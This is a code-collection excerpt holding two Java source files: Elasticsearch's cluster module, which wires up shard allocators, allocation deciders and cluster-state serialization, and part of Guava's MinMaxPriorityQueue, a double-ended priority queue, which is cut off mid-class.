import org.elasticsearch.core.UpdateForV9;
import org.elasticsearch.gateway.GatewayAllocator;
import org.elasticsearch.health.metadata.HealthMetadataService;
import org.elasticsearch.health.node.selection.HealthNodeTaskExecutor;
import org.elasticsearch.indices.SystemIndices;
import org.elasticsearch.ingest.IngestMetadata;
import org.elasticsearch.persistent.PersistentTasksCustomMetadata;
import org.elasticsearch.persistent.PersistentTasksNodeService;
import org.elasticsearch.plugins.ClusterPlugin;
import org.elasticsearch.script.ScriptMetadata;
import org.elasticsearch.snapshots.SnapshotsInfoService;
import org.elasticsearch.tasks.Task;
import org.elasticsearch.tasks.TaskResultsService;
import org.elasticsearch.telemetry.TelemetryProvider;
import org.elasticsearch.threadpool.ThreadPool;
import org.elasticsearch.upgrades.FeatureMigrationResults;
import org.elasticsearch.xcontent.NamedXContentRegistry;
import org.elasticsearch.xcontent.ParseField;
import java.util.ArrayList;
import java.util.Collection;
import java.util.HashMap;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.Objects;
import java.util.function.Function;
import java.util.function.Supplier;
/**
* Configures classes and services that affect the entire cluster.
*/
public class ClusterModule extends AbstractModule {
public static final String BALANCED_ALLOCATOR = "balanced";
public static final String DESIRED_BALANCE_ALLOCATOR = "desired_balance"; // default
public static final Setting<String> SHARDS_ALLOCATOR_TYPE_SETTING = new Setting<>(
"cluster.routing.allocation.type",
DESIRED_BALANCE_ALLOCATOR,
Function.identity(),
Property.NodeScope,
Property.Deprecated
);
private final ClusterService clusterService;
private final IndexNameExpressionResolver indexNameExpressionResolver;
private final AllocationDeciders allocationDeciders;
private final AllocationService allocationService;
private final List<ClusterPlugin> clusterPlugins;
private final MetadataDeleteIndexService metadataDeleteIndexService;
// pkg private for tests
final Collection<AllocationDecider> deciderList;
final ShardsAllocator shardsAllocator;
private final ShardRoutingRoleStrategy shardRoutingRoleStrategy;
private final AllocationStatsService allocationStatsService;
private final TelemetryProvider telemetryProvider;
public ClusterModule(
Settings settings,
ClusterService clusterService,
List<ClusterPlugin> clusterPlugins,
ClusterInfoService clusterInfoService,
SnapshotsInfoService snapshotsInfoService,
ThreadPool threadPool,
SystemIndices systemIndices,
WriteLoadForecaster writeLoadForecaster,
TelemetryProvider telemetryProvider
) {
this.clusterPlugins = clusterPlugins;
this.deciderList = createAllocationDeciders(settings, clusterService.getClusterSettings(), clusterPlugins);
this.allocationDeciders = new AllocationDeciders(deciderList);
this.shardsAllocator = createShardsAllocator(
settings,
clusterService.getClusterSettings(),
threadPool,
clusterPlugins,
clusterService,
this::reconcile,
writeLoadForecaster,
telemetryProvider
);
this.clusterService = clusterService;
this.indexNameExpressionResolver = new IndexNameExpressionResolver(threadPool.getThreadContext(), systemIndices);
this.shardRoutingRoleStrategy = getShardRoutingRoleStrategy(clusterPlugins);
this.allocationService = new AllocationService(
allocationDeciders,
shardsAllocator,
clusterInfoService,
snapshotsInfoService,
shardRoutingRoleStrategy
);
this.metadataDeleteIndexService = new MetadataDeleteIndexService(settings, clusterService, allocationService);
this.allocationStatsService = new AllocationStatsService(clusterService, clusterInfoService, shardsAllocator, writeLoadForecaster);
this.telemetryProvider = telemetryProvider;
}
static ShardRoutingRoleStrategy getShardRoutingRoleStrategy(List<ClusterPlugin> clusterPlugins) {
final var strategies = clusterPlugins.stream().map(ClusterPlugin::getShardRoutingRoleStrategy).filter(Objects::nonNull).toList();
return switch (strategies.size()) {
case 0 -> new ShardRoutingRoleStrategy() {
// NOTE: this is deliberately an anonymous class to avoid any possibility of using this DEFAULT-only strategy when a plugin
// has injected a different strategy.
@Override
public ShardRouting.Role newReplicaRole() {
return ShardRouting.Role.DEFAULT;
}
@Override
public ShardRouting.Role newEmptyRole(int copyIndex) {
return ShardRouting.Role.DEFAULT;
}
};
case 1 -> strategies.get(0);
default -> throw new IllegalArgumentException("multiple plugins define shard role strategies, which is not permitted");
};
}
private ClusterState reconcile(ClusterState clusterState, RerouteStrategy rerouteStrategy) {
return allocationService.executeWithRoutingAllocation(clusterState, "reconcile-desired-balance", rerouteStrategy);
}
public static List<Entry> getNamedWriteables() {
List<Entry> entries = new ArrayList<>();
// Cluster State
registerClusterCustom(entries, SnapshotsInProgress.TYPE, SnapshotsInProgress::new, SnapshotsInProgress::readDiffFrom);
registerClusterCustom(entries, RestoreInProgress.TYPE, RestoreInProgress::new, RestoreInProgress::readDiffFrom);
registerClusterCustom(
entries,
SnapshotDeletionsInProgress.TYPE,
SnapshotDeletionsInProgress::new,
SnapshotDeletionsInProgress::readDiffFrom
);
registerClusterCustom(
entries,
RepositoryCleanupInProgress.TYPE,
RepositoryCleanupInProgress::new,
RepositoryCleanupInProgress::readDiffFrom
);
// Metadata
registerMetadataCustom(entries, RepositoriesMetadata.TYPE, RepositoriesMetadata::new, RepositoriesMetadata::readDiffFrom);
registerMetadataCustom(entries, IngestMetadata.TYPE, IngestMetadata::new, IngestMetadata::readDiffFrom);
registerMetadataCustom(entries, ScriptMetadata.TYPE, ScriptMetadata::new, ScriptMetadata::readDiffFrom);
registerMetadataCustom(entries, IndexGraveyard.TYPE, IndexGraveyard::new, IndexGraveyard::readDiffFrom);
registerMetadataCustom(
entries,
PersistentTasksCustomMetadata.TYPE,
PersistentTasksCustomMetadata::new,
PersistentTasksCustomMetadata::readDiffFrom
);
registerMetadataCustom(
entries,
ComponentTemplateMetadata.TYPE,
ComponentTemplateMetadata::new,
ComponentTemplateMetadata::readDiffFrom
);
registerMetadataCustom(
entries,
ComposableIndexTemplateMetadata.TYPE,
ComposableIndexTemplateMetadata::new,
ComposableIndexTemplateMetadata::readDiffFrom
);
registerMetadataCustom(entries, DataStreamMetadata.TYPE, DataStreamMetadata::new, DataStreamMetadata::readDiffFrom);
registerMetadataCustom(entries, NodesShutdownMetadata.TYPE, NodesShutdownMetadata::new, NodesShutdownMetadata::readDiffFrom);
registerMetadataCustom(entries, FeatureMigrationResults.TYPE, FeatureMigrationResults::new, FeatureMigrationResults::readDiffFrom);
registerMetadataCustom(entries, DesiredNodesMetadata.TYPE, DesiredNodesMetadata::new, DesiredNodesMetadata::readDiffFrom);
// Task Status (not Diffable)
entries.add(new Entry(Task.Status.class, PersistentTasksNodeService.Status.NAME, PersistentTasksNodeService.Status::new));
// Health API
entries.addAll(HealthNodeTaskExecutor.getNamedWriteables());
entries.addAll(HealthMetadataService.getNamedWriteables());
return entries;
}
public static List<NamedXContentRegistry.Entry> getNamedXWriteables() {
List<NamedXContentRegistry.Entry> entries = new ArrayList<>();
// Metadata
entries.add(
new NamedXContentRegistry.Entry(
Metadata.Custom.class,
new ParseField(RepositoriesMetadata.TYPE),
RepositoriesMetadata::fromXContent
)
);
entries.add(
new NamedXContentRegistry.Entry(Metadata.Custom.class, new ParseField(IngestMetadata.TYPE), IngestMetadata::fromXContent)
);
entries.add(
new NamedXContentRegistry.Entry(Metadata.Custom.class, new ParseField(ScriptMetadata.TYPE), ScriptMetadata::fromXContent)
);
entries.add(
new NamedXContentRegistry.Entry(Metadata.Custom.class, new ParseField(IndexGraveyard.TYPE), IndexGraveyard::fromXContent)
);
entries.add(
new NamedXContentRegistry.Entry(
Metadata.Custom.class,
new ParseField(PersistentTasksCustomMetadata.TYPE),
PersistentTasksCustomMetadata::fromXContent
)
);
entries.add(
new NamedXContentRegistry.Entry(
Metadata.Custom.class,
new ParseField(ComponentTemplateMetadata.TYPE),
ComponentTemplateMetadata::fromXContent
)
);
entries.add(
new NamedXContentRegistry.Entry(
Metadata.Custom.class,
new ParseField(ComposableIndexTemplateMetadata.TYPE),
ComposableIndexTemplateMetadata::fromXContent
)
);
entries.add(
new NamedXContentRegistry.Entry(
Metadata.Custom.class,
new ParseField(DataStreamMetadata.TYPE),
DataStreamMetadata::fromXContent
)
);
entries.add(
new NamedXContentRegistry.Entry(
Metadata.Custom.class,
new ParseField(NodesShutdownMetadata.TYPE),
NodesShutdownMetadata::fromXContent
)
);
entries.add(
new NamedXContentRegistry.Entry(
Metadata.Custom.class,
new ParseField(DesiredNodesMetadata.TYPE),
DesiredNodesMetadata::fromXContent
)
);
return entries;
}
private static <T extends ClusterState.Custom> void registerClusterCustom(
List<Entry> entries,
String name,
Reader<? extends T> reader,
Reader<NamedDiff<?>> diffReader
) {
registerCustom(entries, ClusterState.Custom.class, name, reader, diffReader);
}
private static <T extends Metadata.Custom> void registerMetadataCustom(
List<Entry> entries,
String name,
Reader<? extends T> reader,
Reader<NamedDiff<?>> diffReader
) {
registerCustom(entries, Metadata.Custom.class, name, reader, diffReader);
}
private static <T extends NamedWriteable> void registerCustom(
List<Entry> entries,
Class<T> category,
String name,
Reader<? extends T> reader,
Reader<NamedDiff<?>> diffReader
) {
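// Each custom section is registered twice: once as the full NamedWriteable and once as the
// NamedDiff that carries incremental changes when the cluster state is published.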
entries.add(new Entry(category, name, reader));
entries.add(new Entry(NamedDiff.class, name, diffReader));
}
public IndexNameExpressionResolver getIndexNameExpressionResolver() {
return indexNameExpressionResolver;
}
// TODO: this is public so allocation benchmark can access the default deciders...can we do that in another way?
/** Returns the collection of built-in {@link AllocationDecider}s together with any contributed by the given plugins. */
public static Collection<AllocationDecider> createAllocationDeciders(
Settings settings,
ClusterSettings clusterSettings,
List<ClusterPlugin> clusterPlugins
) {
// collect deciders by class so that we can detect duplicates
Map<Class<?>, AllocationDecider> deciders = new LinkedHashMap<>();
addAllocationDecider(deciders, new MaxRetryAllocationDecider());
addAllocationDecider(deciders, new ResizeAllocationDecider());
addAllocationDecider(deciders, new ReplicaAfterPrimaryActiveAllocationDecider());
addAllocationDecider(deciders, new RebalanceOnlyWhenActiveAllocationDecider());
addAllocationDecider(deciders, new ClusterRebalanceAllocationDecider(clusterSettings));
addAllocationDecider(deciders, new ConcurrentRebalanceAllocationDecider(clusterSettings));
addAllocationDecider(deciders, new EnableAllocationDecider(clusterSettings));
addAllocationDecider(deciders, new NodeVersionAllocationDecider());
addAllocationDecider(deciders, new SnapshotInProgressAllocationDecider());
addAllocationDecider(deciders, new RestoreInProgressAllocationDecider());
addAllocationDecider(deciders, new NodeShutdownAllocationDecider());
addAllocationDecider(deciders, new NodeReplacementAllocationDecider());
addAllocationDecider(deciders, new FilterAllocationDecider(settings, clusterSettings));
addAllocationDecider(deciders, new SameShardAllocationDecider(clusterSettings));
addAllocationDecider(deciders, new DiskThresholdDecider(settings, clusterSettings));
addAllocationDecider(deciders, new ThrottlingAllocationDecider(clusterSettings));
addAllocationDecider(deciders, new ShardsLimitAllocationDecider(clusterSettings));
addAllocationDecider(deciders, new AwarenessAllocationDecider(settings, clusterSettings));
clusterPlugins.stream()
.flatMap(p -> p.createAllocationDeciders(settings, clusterSettings).stream())
.forEach(d -> addAllocationDecider(deciders, d));
return deciders.values();
}
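// Illustrative sketch (not part of the original source; the rule shown is hypothetical): a
// ClusterPlugin contributes extra deciders via createAllocationDeciders, and they are appended
// after the built-in ones collected above, e.g.:
//
//   @Override
//   public Collection<AllocationDecider> createAllocationDeciders(Settings settings, ClusterSettings clusterSettings) {
//       return List.of(new AllocationDecider() {
//           @Override
//           public Decision canAllocate(ShardRouting shardRouting, RoutingNode node, RoutingAllocation allocation) {
//               // hypothetical rule: keep shards off nodes whose names start with "cold-"
//               return node.node().getName().startsWith("cold-") ? Decision.NO : Decision.YES;
//           }
//       });
//   }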
/** Adds the given allocation decider to the given collection, throwing an exception if a decider of the same class has already been added. */
private static void addAllocationDecider(Map<Class<?>, AllocationDecider> deciders, AllocationDecider decider) {
if (deciders.put(decider.getClass(), decider) != null) {
throw new IllegalArgumentException("Cannot specify allocation decider [" + decider.getClass().getName() + "] twice");
}
}
@UpdateForV9 // in v9 there is only one allocator
private static ShardsAllocator createShardsAllocator(
Settings settings,
ClusterSettings clusterSettings,
ThreadPool threadPool,
List<ClusterPlugin> clusterPlugins,
ClusterService clusterService,
DesiredBalanceReconcilerAction reconciler,
WriteLoadForecaster writeLoadForecaster,
TelemetryProvider telemetryProvider
) {
Map<String, Supplier<ShardsAllocator>> allocators = new HashMap<>();
allocators.put(BALANCED_ALLOCATOR, () -> new BalancedShardsAllocator(clusterSettings, writeLoadForecaster));
allocators.put(
DESIRED_BALANCE_ALLOCATOR,
() -> new DesiredBalanceShardsAllocator(
clusterSettings,
new BalancedShardsAllocator(clusterSettings, writeLoadForecaster),
threadPool,
clusterService,
reconciler,
telemetryProvider
)
);
for (ClusterPlugin plugin : clusterPlugins) {
// noinspection removal
plugin.getShardsAllocators(settings, clusterSettings).forEach((k, v) -> {
if (allocators.put(k, v) != null) {
throw new IllegalArgumentException("ShardsAllocator [" + k + "] already defined");
}
});
}
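// The allocator is selected by the SHARDS_ALLOCATOR_TYPE_SETTING node setting (believed to be the
// "cluster.routing.allocation.type" key); unknown names are rejected below.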
String allocatorName = SHARDS_ALLOCATOR_TYPE_SETTING.get(settings);
Supplier<ShardsAllocator> allocatorSupplier = allocators.get(allocatorName);
if (allocatorSupplier == null) {
throw new IllegalArgumentException("Unknown ShardsAllocator [" + allocatorName + "]");
}
return Objects.requireNonNull(allocatorSupplier.get(), "ShardsAllocator factory for [" + allocatorName + "] returned null");
}
public AllocationService getAllocationService() {
return allocationService;
}
@Override
protected void configure() {
bind(GatewayAllocator.class).asEagerSingleton();
bind(AllocationService.class).toInstance(allocationService);
bind(ClusterService.class).toInstance(clusterService);
bind(NodeConnectionsService.class).asEagerSingleton();
bind(MetadataDeleteIndexService.class).toInstance(metadataDeleteIndexService);
bind(MetadataIndexStateService.class).asEagerSingleton();
bind(MetadataMappingService.class).asEagerSingleton();
bind(MetadataIndexAliasesService.class).asEagerSingleton();
bind(MetadataIndexTemplateService.class).asEagerSingleton();
bind(IndexNameExpressionResolver.class).toInstance(indexNameExpressionResolver);
bind(DelayedAllocationService.class).asEagerSingleton();
bind(ShardStateAction.class).asEagerSingleton();
bind(MappingUpdatedAction.class).asEagerSingleton();
bind(TaskResultsService.class).asEagerSingleton();
bind(AllocationDeciders.class).toInstance(allocationDeciders);
bind(ShardsAllocator.class).toInstance(shardsAllocator);
bind(ShardRoutingRoleStrategy.class).toInstance(shardRoutingRoleStrategy);
bind(AllocationStatsService.class).toInstance(allocationStatsService);
bind(TelemetryProvider.class).toInstance(telemetryProvider);
bind(MetadataRolloverService.class).asEagerSingleton();
}
public void setExistingShardsAllocators(GatewayAllocator gatewayAllocator) {
final Map<String, ExistingShardsAllocator> existingShardsAllocators = new HashMap<>();
existingShardsAllocators.put(GatewayAllocator.ALLOCATOR_NAME, gatewayAllocator);
for (ClusterPlugin clusterPlugin : clusterPlugins) {
for (Map.Entry<String, ExistingShardsAllocator> existingShardsAllocatorEntry : clusterPlugin.getExistingShardsAllocators()
.entrySet()) {
final String allocatorName = existingShardsAllocatorEntry.getKey();
if (existingShardsAllocators.put(allocatorName, existingShardsAllocatorEntry.getValue()) != null) {
throw new IllegalArgumentException(
"ExistingShardsAllocator ["
+ allocatorName
+ "] from ["
+ clusterPlugin.getClass().getName()
+ "] was already defined"
);
}
}
}
allocationService.setExistingShardsAllocators(existingShardsAllocators);
}
}
| elastic/elasticsearch | server/src/main/java/org/elasticsearch/cluster/ClusterModule.java |
1,163 | /*
* Copyright (C) 2010 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.collect;
import static com.google.common.base.Preconditions.checkArgument;
import static com.google.common.base.Preconditions.checkNotNull;
import static com.google.common.base.Preconditions.checkPositionIndex;
import static com.google.common.base.Preconditions.checkState;
import static com.google.common.collect.CollectPreconditions.checkRemove;
import static java.util.Objects.requireNonNull;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.J2ktIncompatible;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.math.IntMath;
import com.google.errorprone.annotations.CanIgnoreReturnValue;
import com.google.j2objc.annotations.Weak;
import com.google.j2objc.annotations.WeakOuter;
import java.util.AbstractQueue;
import java.util.ArrayDeque;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.Comparator;
import java.util.ConcurrentModificationException;
import java.util.Iterator;
import java.util.List;
import java.util.NoSuchElementException;
import java.util.PriorityQueue;
import java.util.Queue;
import javax.annotation.CheckForNull;
import org.checkerframework.checker.nullness.qual.Nullable;
/**
* A double-ended priority queue, which provides constant-time access to both its least element and
* its greatest element, as determined by the queue's specified comparator. If no comparator is
* given at creation time, the natural order of elements is used. If no maximum size is given at
* creation time, the queue is unbounded.
*
* <p>Usage example:
*
* <pre>{@code
* MinMaxPriorityQueue<User> users = MinMaxPriorityQueue.orderedBy(userComparator)
* .maximumSize(1000)
* .create();
* }</pre>
*
* <p>As a {@link Queue} it functions exactly as a {@link PriorityQueue}: its head element -- the
* implicit target of the methods {@link #peek()}, {@link #poll()} and {@link #remove()} -- is
* defined as the <i>least</i> element in the queue according to the queue's comparator. But unlike
* a regular priority queue, the methods {@link #peekLast}, {@link #pollLast} and {@link
* #removeLast} are also provided, to act on the <i>greatest</i> element in the queue instead.
*
* <p>A min-max priority queue can be configured with a maximum size. If so, each time the size of
* the queue exceeds that value, the queue automatically removes its greatest element according to
* its comparator (which might be the element that was just added). This is different from
* conventional bounded queues, which either block or reject new elements when full.
*
* <p>This implementation is based on the <a
* href="http://portal.acm.org/citation.cfm?id=6621">min-max heap</a> developed by Atkinson, et al.
* Unlike many other double-ended priority queues, it stores elements in a single array, as compact
* as the traditional heap data structure used in {@link PriorityQueue}.
*
* <p>This class is not thread-safe, and does not accept null elements.
*
* <p><i>Performance notes:</i>
*
* <ul>
* <li>If you only access one end of the queue, and do use a maximum size, this class will perform
* significantly worse than a {@code PriorityQueue} with manual eviction above the maximum
* size. In many cases {@link Ordering#leastOf} may work for your use case with significantly
* improved (and asymptotically superior) performance.
* <li>The retrieval operations {@link #peek}, {@link #peekFirst}, {@link #peekLast}, {@link
* #element}, and {@link #size} are constant-time.
* <li>The enqueuing and dequeuing operations ({@link #offer}, {@link #add}, and all the forms of
 * {@link #poll} and {@link #remove()}) run in {@code O(log n)} time.
* <li>The {@link #remove(Object)} and {@link #contains} operations require linear ({@code O(n)})
* time.
* <li>If you only access one end of the queue, and don't use a maximum size, this class is
* functionally equivalent to {@link PriorityQueue}, but significantly slower.
* </ul>
*
* @author Sverre Sundsdal
* @author Torbjorn Gannholm
* @since 8.0
*/
@GwtCompatible
@ElementTypesAreNonnullByDefault
public final class MinMaxPriorityQueue<E> extends AbstractQueue<E> {
/**
* Creates a new min-max priority queue with default settings: natural order, no maximum size, no
* initial contents, and an initial expected size of 11.
*/
public static <E extends Comparable<E>> MinMaxPriorityQueue<E> create() {
return new Builder<Comparable<E>>(Ordering.natural()).create();
}
/**
* Creates a new min-max priority queue using natural order, no maximum size, and initially
* containing the given elements.
*/
public static <E extends Comparable<E>> MinMaxPriorityQueue<E> create(
Iterable<? extends E> initialContents) {
return new Builder<E>(Ordering.<E>natural()).create(initialContents);
}
/**
* Creates and returns a new builder, configured to build {@code MinMaxPriorityQueue} instances
* that use {@code comparator} to determine the least and greatest elements.
*/
/*
* TODO(cpovirk): Change to Comparator<? super B> to permit Comparator<@Nullable ...> and
* Comparator<SupertypeOfB>? What we have here matches the immutable collections, but those also
* expose a public Builder constructor that accepts "? super." So maybe we should do *that*
* instead.
*/
public static <B> Builder<B> orderedBy(Comparator<B> comparator) {
return new Builder<>(comparator);
}
/**
* Creates and returns a new builder, configured to build {@code MinMaxPriorityQueue} instances
* sized appropriately to hold {@code expectedSize} elements.
*/
@SuppressWarnings("rawtypes") // https://github.com/google/guava/issues/989
public static Builder<Comparable> expectedSize(int expectedSize) {
return new Builder<Comparable>(Ordering.natural()).expectedSize(expectedSize);
}
/**
* Creates and returns a new builder, configured to build {@code MinMaxPriorityQueue} instances
* that are limited to {@code maximumSize} elements. Each time a queue grows beyond this bound, it
* immediately removes its greatest element (according to its comparator), which might be the
* element that was just added.
*/
@SuppressWarnings("rawtypes") // https://github.com/google/guava/issues/989
public static Builder<Comparable> maximumSize(int maximumSize) {
return new Builder<Comparable>(Ordering.natural()).maximumSize(maximumSize);
}
/**
* The builder class used in creation of min-max priority queues. Instead of constructing one
* directly, use {@link MinMaxPriorityQueue#orderedBy(Comparator)}, {@link
* MinMaxPriorityQueue#expectedSize(int)} or {@link MinMaxPriorityQueue#maximumSize(int)}.
*
* @param <B> the upper bound on the eventual type that can be produced by this builder (for
* example, a {@code Builder<Number>} can produce a {@code Queue<Number>} or {@code
* Queue<Integer>} but not a {@code Queue<Object>}).
* @since 8.0
*/
public static final class Builder<B> {
/*
* TODO(kevinb): when the dust settles, see if we still need this or can
* just default to DEFAULT_CAPACITY.
*/
private static final int UNSET_EXPECTED_SIZE = -1;
private final Comparator<B> comparator;
private int expectedSize = UNSET_EXPECTED_SIZE;
private int maximumSize = Integer.MAX_VALUE;
private Builder(Comparator<B> comparator) {
this.comparator = checkNotNull(comparator);
}
/**
* Configures this builder to build min-max priority queues with an initial expected size of
* {@code expectedSize}.
*/
@CanIgnoreReturnValue
public Builder<B> expectedSize(int expectedSize) {
checkArgument(expectedSize >= 0);
this.expectedSize = expectedSize;
return this;
}
/**
* Configures this builder to build {@code MinMaxPriorityQueue} instances that are limited to
* {@code maximumSize} elements. Each time a queue grows beyond this bound, it immediately
* removes its greatest element (according to its comparator), which might be the element that
* was just added.
*/
@CanIgnoreReturnValue
public Builder<B> maximumSize(int maximumSize) {
checkArgument(maximumSize > 0);
this.maximumSize = maximumSize;
return this;
}
/**
* Builds a new min-max priority queue using the previously specified options, and having no
* initial contents.
*/
public <T extends B> MinMaxPriorityQueue<T> create() {
return create(Collections.<T>emptySet());
}
/**
* Builds a new min-max priority queue using the previously specified options, and having the
* given initial elements.
*/
public <T extends B> MinMaxPriorityQueue<T> create(Iterable<? extends T> initialContents) {
MinMaxPriorityQueue<T> queue =
new MinMaxPriorityQueue<>(
this, initialQueueSize(expectedSize, maximumSize, initialContents));
for (T element : initialContents) {
queue.offer(element);
}
return queue;
}
@SuppressWarnings("unchecked") // safe "contravariant cast"
private <T extends B> Ordering<T> ordering() {
return Ordering.from((Comparator<T>) comparator);
}
}
private final Heap minHeap;
private final Heap maxHeap;
@VisibleForTesting final int maximumSize;
private @Nullable Object[] queue;
private int size;
private int modCount;
private MinMaxPriorityQueue(Builder<? super E> builder, int queueSize) {
Ordering<E> ordering = builder.ordering();
this.minHeap = new Heap(ordering);
this.maxHeap = new Heap(ordering.reverse());
minHeap.otherHeap = maxHeap;
maxHeap.otherHeap = minHeap;
this.maximumSize = builder.maximumSize;
// TODO(kevinb): pad?
this.queue = new Object[queueSize];
}
@Override
public int size() {
return size;
}
/**
* Adds the given element to this queue. If this queue has a maximum size, after adding {@code
* element} the queue will automatically evict its greatest element (according to its comparator),
* which may be {@code element} itself.
*
* @return {@code true} always
*/
@CanIgnoreReturnValue
@Override
public boolean add(E element) {
offer(element);
return true;
}
@CanIgnoreReturnValue
@Override
public boolean addAll(Collection<? extends E> newElements) {
boolean modified = false;
for (E element : newElements) {
offer(element);
modified = true;
}
return modified;
}
/**
* Adds the given element to this queue. If this queue has a maximum size, after adding {@code
* element} the queue will automatically evict its greatest element (according to its comparator),
* which may be {@code element} itself.
*/
@CanIgnoreReturnValue
@Override
public boolean offer(E element) {
checkNotNull(element);
modCount++;
int insertIndex = size++;
growIfNeeded();
// Adds the element to the end of the heap and bubbles it up to the correct
// position.
heapForIndex(insertIndex).bubbleUp(insertIndex, element);
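// When the maximum size has been exceeded, pollLast() evicts the greatest element; offer reports
// failure (false) only if the element that was just added is the one that got evicted.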
return size <= maximumSize || pollLast() != element;
}
@CanIgnoreReturnValue
@Override
@CheckForNull
public E poll() {
return isEmpty() ? null : removeAndGet(0);
}
@SuppressWarnings("unchecked") // we must carefully only allow Es to get in
E elementData(int index) {
/*
* requireNonNull is safe as long as we're careful to call this method only with populated
* indexes.
*/
return (E) requireNonNull(queue[index]);
}
@Override
@CheckForNull
public E peek() {
return isEmpty() ? null : elementData(0);
}
/** Returns the index of the max element. */
private int getMaxElementIndex() {
switch (size) {
case 1:
return 0; // The lone element in the queue is the maximum.
case 2:
return 1; // The lone element in the maxHeap is the maximum.
default:
// The max element must sit on the first level of the maxHeap. It is
// actually the *lesser* of the two from the maxHeap's perspective.
return (maxHeap.compareElements(1, 2) <= 0) ? 1 : 2;
}
}
/**
* Removes and returns the least element of this queue, or returns {@code null} if the queue is
* empty.
*/
@CanIgnoreReturnValue
@CheckForNull
public E pollFirst() {
return poll();
}
/**
* Removes and returns the least element of this queue.
*
* @throws NoSuchElementException if the queue is empty
*/
@CanIgnoreReturnValue
public E removeFirst() {
return remove();
}
/**
* Retrieves, but does not remove, the least element of this queue, or returns {@code null} if the
* queue is empty.
*/
@CheckForNull
public E peekFirst() {
return peek();
}
/**
* Removes and returns the greatest element of this queue, or returns {@code null} if the queue is
* empty.
*/
@CanIgnoreReturnValue
@CheckForNull
public E pollLast() {
return isEmpty() ? null : removeAndGet(getMaxElementIndex());
}
/**
* Removes and returns the greatest element of this queue.
*
* @throws NoSuchElementException if the queue is empty
*/
@CanIgnoreReturnValue
public E removeLast() {
if (isEmpty()) {
throw new NoSuchElementException();
}
return removeAndGet(getMaxElementIndex());
}
/**
* Retrieves, but does not remove, the greatest element of this queue, or returns {@code null} if
* the queue is empty.
*/
@CheckForNull
public E peekLast() {
return isEmpty() ? null : elementData(getMaxElementIndex());
}
/**
* Removes the element at position {@code index}.
*
 * <p>Normally this method leaves the elements at positions up to {@code index - 1}, inclusive,
 * untouched. Under these circumstances, it returns {@code null}.
*
* <p>Occasionally, in order to maintain the heap invariant, it must swap a later element of the
* list with one before {@code index}. Under these circumstances it returns a pair of elements as
* a {@link MoveDesc}. The first one is the element that was previously at the end of the heap and
* is now at some position before {@code index}. The second element is the one that was swapped
* down to replace the element at {@code index}. This fact is used by iterator.remove so as to
* visit elements during a traversal once and only once.
*/
@VisibleForTesting
@CanIgnoreReturnValue
@CheckForNull
MoveDesc<E> removeAt(int index) {
checkPositionIndex(index, size);
modCount++;
size--;
if (size == index) {
queue[size] = null;
return null;
}
E actualLastElement = elementData(size);
int lastElementAt = heapForIndex(size).swapWithConceptuallyLastElement(actualLastElement);
if (lastElementAt == index) {
// 'actualLastElement' is now at 'lastElementAt', and the element that was at 'lastElementAt'
// is now at the end of queue. If that's the element we wanted to remove in the first place,
// don't try to (incorrectly) trickle it. Instead, just delete it and we're done.
queue[size] = null;
return null;
}
E toTrickle = elementData(size);
queue[size] = null;
MoveDesc<E> changes = fillHole(index, toTrickle);
if (lastElementAt < index) {
// Last element is moved to before index, swapped with trickled element.
if (changes == null) {
// The trickled element is still after index.
return new MoveDesc<>(actualLastElement, toTrickle);
} else {
// The trickled element is back before index, but the replaced element
// has now been moved after index.
return new MoveDesc<>(actualLastElement, changes.replaced);
}
}
// Trickled element was after index to begin with, no adjustment needed.
return changes;
}
@CheckForNull
private MoveDesc<E> fillHole(int index, E toTrickle) {
Heap heap = heapForIndex(index);
// We consider elementData(index) a "hole", and we want to fill it
// with the last element of the heap, toTrickle.
// Since the last element of the heap is from the bottom level, we
// optimistically fill index position with elements from lower levels,
// moving the hole down. In most cases this reduces the number of
// comparisons with toTrickle, but in some cases we will need to bubble it
// all the way up again.
int vacated = heap.fillHoleAt(index);
// Try to see if toTrickle can be bubbled up min levels.
int bubbledTo = heap.bubbleUpAlternatingLevels(vacated, toTrickle);
if (bubbledTo == vacated) {
// Could not bubble toTrickle up min levels, try moving
// it from min level to max level (or max to min level) and bubble up
// there.
return heap.tryCrossOverAndBubbleUp(index, vacated, toTrickle);
} else {
return (bubbledTo < index) ? new MoveDesc<E>(toTrickle, elementData(index)) : null;
}
}
// Returned from removeAt() to iterator.remove()
static class MoveDesc<E> {
final E toTrickle;
final E replaced;
MoveDesc(E toTrickle, E replaced) {
this.toTrickle = toTrickle;
this.replaced = replaced;
}
}
/** Removes and returns the value at {@code index}. */
private E removeAndGet(int index) {
E value = elementData(index);
removeAt(index);
return value;
}
private Heap heapForIndex(int i) {
return isEvenLevel(i) ? minHeap : maxHeap;
}
private static final int EVEN_POWERS_OF_TWO = 0x55555555;
private static final int ODD_POWERS_OF_TWO = 0xaaaaaaaa;
@VisibleForTesting
static boolean isEvenLevel(int index) {
int oneBased = ~~(index + 1); // for GWT
checkState(oneBased > 0, "negative index");
return (oneBased & EVEN_POWERS_OF_TWO) > (oneBased & ODD_POWERS_OF_TWO);
}
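// Added worked example (not part of the original source): EVEN_POWERS_OF_TWO has bits set at the
// even positions (0, 2, 4, ...) and ODD_POWERS_OF_TWO at the odd positions, so the comparison above
// asks whether the highest set bit of (index + 1) sits at an even position. Index 0 -> 1 (0b1):
// even, so level 0 (the root) is a min level. Indices 1..2 -> 2..3 (0b1x): odd, so level 1 is a max
// level. Indices 3..6 -> 4..7 (0b1xx): even, a min level again. Levels therefore alternate
// min, max, min, ... which is exactly how heapForIndex picks between minHeap and maxHeap.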
/**
* Returns {@code true} if the MinMax heap structure holds. This is only used in testing.
*
* <p>TODO(kevinb): move to the test class?
*/
@VisibleForTesting
boolean isIntact() {
for (int i = 1; i < size; i++) {
if (!heapForIndex(i).verifyIndex(i)) {
return false;
}
}
return true;
}
/**
* Each instance of MinMaxPriorityQueue encapsulates two instances of Heap: a min-heap and a
* max-heap. Conceptually, these might each have their own array for storage, but for efficiency's
* sake they are stored interleaved on alternate heap levels in the same array (MMPQ.queue).
*/
@WeakOuter
class Heap {
final Ordering<E> ordering;
